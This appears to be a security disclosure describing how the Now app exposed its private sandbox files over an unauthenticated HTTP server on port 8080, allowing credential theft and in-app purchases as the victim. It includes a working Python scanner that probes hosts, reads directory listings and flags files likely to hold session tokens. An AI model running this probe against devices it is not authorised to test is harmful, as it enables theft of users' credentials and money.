Now Vulnerability

Now is a live-broadcast app that ranks in the top 10 of the social networking category in China. When the app launches, it uses the third-party library MongooseDaemon to start an HTTP service on port 8080. That service serves the app's private (sandbox) folder to anyone who can reach the port, with no authentication. The exposed data is shown below. By downloading the files in the private folder, an attacker can obtain the victim's credentials; with those credentials the attacker can sign in to the app as the victim and make In-App Purchases with the victim's pre-deposited balance. The service is reachable over the cellular network, so an attacker can scan the cellular network to find victims.

The vendor, Tencent Technology (Shenzhen) Company Limited, rated this issue as high severity and responded quickly: the problem was fixed via a hot patch on the same day they received the notification. An audit of the Android counterpart found that the Android app does not have this issue.
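The "scan for victims, then list the private folder" step described above, as an added example written for this page (it is not the researcher's demo tooling and nothing in it comes from the Now app): a small Python checker that fetches / from a host on port 8080, recognises an auto-generated "Index of" page, and flags file names that commonly carry session state. The listing markup and file names are constructed for the example and only approximate what an embedded server such as Mongoose emits; the list of sensitive extensions is an assumption to be tuned for the platform being audited.

```python
"""Probe hosts for an unauthenticated embedded HTTP server serving a directory index.

Added example for this page; not the researcher's tooling and not code from the
Now app. The listing below is a constructed approximation of an auto-generated
"Index of" page and the file names are invented.
"""
import re
import socket
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Title that embedded servers (Mongoose included) put on an auto-generated index page.
INDEX_TITLE = re.compile(r"<title>\s*Index of\s+([^<]+)</title>", re.IGNORECASE)
HREF = re.compile(r'<a\s+href="([^"]+)"', re.IGNORECASE)

# File types that commonly hold tokens or session state in an app sandbox
# (assumption; tune to the platform you are auditing).
SENSITIVE_SUFFIXES = (".plist", ".db", ".sqlite", ".sqlite3", ".json", ".xml", ".txt")


@dataclass
class Finding:
    host: str
    port: int
    root: str
    entries: List[str] = field(default_factory=list)
    sensitive: List[str] = field(default_factory=list)


def parse_directory_listing(body: str) -> Optional[Tuple[str, List[str]]]:
    """Return (root, entries) if the body is an auto-generated directory index, else None."""
    m = INDEX_TITLE.search(body)
    if m is None:
        return None
    root = m.group(1).strip()
    entries = []
    for href in HREF.findall(body):
        if href in ("/", "..", "../") or href.startswith(("?", "#", "http")):
            continue  # skip parent links, column-sort links and off-site links
        entries.append(href)
    return root, entries


def flag_sensitive(entries: List[str]) -> List[str]:
    """Pick out entries whose extension suggests stored credentials or session state."""
    return [e for e in entries if e.lower().endswith(SENSITIVE_SUFFIXES)]


def analyze(host: str, port: int, body: str) -> Optional[Finding]:
    """Turn a fetched '/' response body into a Finding, or None if no index is exposed."""
    parsed = parse_directory_listing(body)
    if parsed is None:
        return None
    root, entries = parsed
    return Finding(host, port, root, entries, flag_sensitive(entries))


def http_get_root(host: str, port: int = 8080, timeout: float = 2.0) -> Optional[str]:
    """Minimal GET / over a raw socket; returns the body of a 200 response, else None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(f"GET / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
            chunks = []
            while True:
                d = s.recv(4096)
                if not d:
                    break
                chunks.append(d)
    except OSError:
        return None  # closed port, timeout, unreachable host
    raw = b"".join(chunks).decode("utf-8", "replace")
    head, _, body = raw.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]
    if not status_line.startswith("HTTP/1.") or " 200 " not in status_line:
        return None
    return body


def check_host(host: str, port: int = 8080) -> Optional[Finding]:
    """Network version: fetch / from host:port and analyze it."""
    body = http_get_root(host, port)
    return None if body is None else analyze(host, port, body)


# Constructed sample response standing in for what an exposed device would return.
SAMPLE_LISTING = """<html><head><title>Index of /</title></head>
<body><h1>Index of /</h1><table>
<tr><td><a href="..">Parent directory</a></td><td>&nbsp;</td><td>&nbsp;-</td></tr>
<tr><td><a href="?n">Name</a></td><td><a href="?d">Modified</a></td><td><a href="?s">Size</a></td></tr>
<tr><td><a href="Preferences/">Preferences/</a></td><td>&nbsp;2017-03-01 10:00</td><td>&nbsp;[DIR]</td></tr>
<tr><td><a href="user_session.plist">user_session.plist</a></td><td>&nbsp;2017-03-01 10:00</td><td>&nbsp;1.2k</td></tr>
<tr><td><a href="cache.db">cache.db</a></td><td>&nbsp;2017-03-01 10:00</td><td>&nbsp;48k</td></tr>
<tr><td><a href="avatar.png">avatar.png</a></td><td>&nbsp;2017-03-01 10:00</td><td>&nbsp;12k</td></tr>
</table></body></html>"""


if __name__ == "__main__":
    # 192.0.2.10 is a TEST-NET address; analyze() sends no traffic.
    print(analyze("192.0.2.10", 8080, SAMPLE_LISTING))
    # Against a device on a network you are authorised to assess:
    #   print(check_host("<device-ip>"))
```

The same check is useful from the other side: an app that embeds an HTTP server should bind it to the loopback interface only, require authentication, and never use the sandbox root as its document root, so running this probe against a test device from a second host on the same network is a quick pre-release check that none of those three mistakes made it into a build.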

Demo:

Attack demo for Now app


Data exposed by Now


Vendor Response:

Official response from the vendor's security response center (translated by Google Translate)


Official response from the vendor's security response center (original)